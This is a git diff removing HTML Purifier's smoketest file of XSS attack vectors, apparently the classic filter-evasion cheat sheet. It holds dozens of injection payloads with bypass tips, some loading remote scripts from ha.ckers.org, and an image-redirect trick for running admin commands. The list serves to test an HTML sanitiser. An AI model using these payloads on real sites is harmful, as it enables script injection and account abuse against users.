path: root/3rdparty/htmlpurifier/smoketests/xssAttacks.xml
Diffstat (limited to '3rdparty/htmlpurifier/smoketests/xssAttacks.xml')
-rw-r--r--  3rdparty/htmlpurifier/smoketests/xssAttacks.xml  1307
1 files changed, 0 insertions, 1307 deletions
diff --git a/3rdparty/htmlpurifier/smoketests/xssAttacks.xml b/3rdparty/htmlpurifier/smoketests/xssAttacks.xml
deleted file mode 100644
index d90f4575f..000000000
--- a/3rdparty/htmlpurifier/smoketests/xssAttacks.xml
+++ /dev/null
@@ -1,1307 +0,0 @@
-<?xml version="1.0"?>
-<xss>
- <attack>
- <name>XSS Locator</name>
- <code>&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}</code>
-
- <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word &quot;XSS&quot; will pop up. You&apos;ll need to replace the &quot;&amp;&quot; with &quot;%26&quot; if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable. Tip: If you&apos;re in a rush and need to quickly check a page, often times injecting the deprecated &quot;&lt;PLAINTEXT&gt;&quot; tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably.</desc>
- <label>Basic XSS Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>XSS Quick Test</name>
- <code>&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}</code>
- <desc>If you don&apos;t have much space, this string is a nice compact XSS injection check. View source after injecting it and look for &lt;XSS versus &amp;lt;XSS to see if it is vulnerable.</desc>
-
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>SCRIPT w/Alert()</name>
- <code>&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;</code>
- <desc>Basic injection attack</desc>
-
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>SCRIPT w/Source File</name>
- <code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;</code>
- <desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc>
- <label>Basic XSS Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>SCRIPT w/Char Code</name>
- <code>&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</code>
- <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word &quot;XSS&quot; will pop up.</desc>
-
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>BASE</name>
- <code>&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;</code>
- <desc>Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won&apos;t get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like &quot;images/image.jpg&quot; rather than full paths. If the path includes a leading forward slash like &quot;/images/image.jpg&quot; you can remove one slash from this vector (as long as there are two to begin the comment this will work</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>BGSOUND</name>
- <code>&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
- <desc>BGSOUND</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>BODY background-image</name>
- <code>&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
- <desc>BODY image</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>BODY ONLOAD</name>
- <code>&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;</code>
- <desc>BODY tag (I like this method because it doesn&apos;t require using any variants of &quot;javascript:&quot; or &quot;&lt;SCRIPT...&quot; to accomplish the XSS attack)</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>DIV background-image 1</name>
- <code>&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;</code>
- <desc>Div background-image</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>DIV background-image 2</name>
- <code>&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;</code>
- <desc>Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>DIV expression</name>
- <code>&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;</code>
- <desc>Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and &quot;expression&quot;</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>FRAME</name>
- <code>&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;</code>
- <desc>Frame (Frames have the same sorts of XSS problems as iframes).</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>IFRAME</name>
- <code>&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;</code>
- <desc>Iframe (If iframes are allowed there are a lot of other XSS problems as well).</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>INPUT Image</name>
- <code>&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
- <desc>INPUT Image</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
- </attack>
-
- <attack>
- <name>IMG w/JavaScript Directive</name>
- <code>&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
- <desc>Image XSS using the JavaScript directive.</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>IMG No Quotes/Semicolon</name>
- <code>&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;</code>
- <desc>No quotes and no semicolon</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>IMG Dynsrc</name>
- <code>&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
- <desc>IMG Dynsrc</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>IMG Lowsrc</name>
- <code>&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
- <desc>IMG Lowsrc</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>IMG Embedded commands 1</name>
- <code>&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;</code>
- <desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>IMG Embedded commands 2</name>
- <code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser</code>
- <desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal &lt;IMG SRC=&quot;http://badguy.com/a.jpg&quot;&gt; could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>IMG STYLE w/expression</name>
- <code>exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;);
-xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</code>
-
- <desc>IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>List-style-image</name>
- <code>&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</code>
-
- <desc>Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>IMG w/VBscript</name>
- <code>&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;</code>
- <desc>VBscript in an image</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>LAYER</name>
- <code>&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;</code>
- <desc>Layer (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>Livescript</name>
- <code>&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;</code>
- <desc>Livescript (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>US-ASCII encoding</name>
- <code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code>
- <desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS4&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>META</name>
- <code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
- <desc>The odd thing about meta refresh is that it doesn&apos;t send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs.</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>META w/data:URL</name>
- <code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;</code>
- <desc>This is nice because it also doesn&apos;t have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>META w/additional URL parameter</name>
- <code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
- <desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an &quot;http://&quot; you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>Mocha</name>
- <code>&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;</code>
- <desc>Mocha (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>OBJECT</name>
- <code>&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;</code>
- <desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>OBJECT w/Embedded XSS</name>
- <code>&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;</code>
- <desc>Using an OBJECT tag you can embed XSS directly (this is unverified).</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Embed Flash</name>
- <code>&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;</code>
-
- <desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess=&quot;never&quot; and allownetworking=&quot;internal&quot; it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>OBJECT w/Flash 2</name>
- <code>a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);</code>
-
- <desc>Using this action script inside flash can obfuscate your XSS vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>STYLE</name>
- <code>&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;</code>
- <desc>STYLE tag (Older versions of Netscape only)</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>STYLE w/Comment</name>
- <code>&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;</code>
- <desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc>
- <label>HTML Element Attacks</label>
-
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
- <name>STYLE w/Anonymous HTML</name>
- <code>&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;</code>
- <desc>Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don&apos;t really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter)</desc>
-
- <label>HTML Element Attacks</label>
- <browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
- </attack>
- <attack>
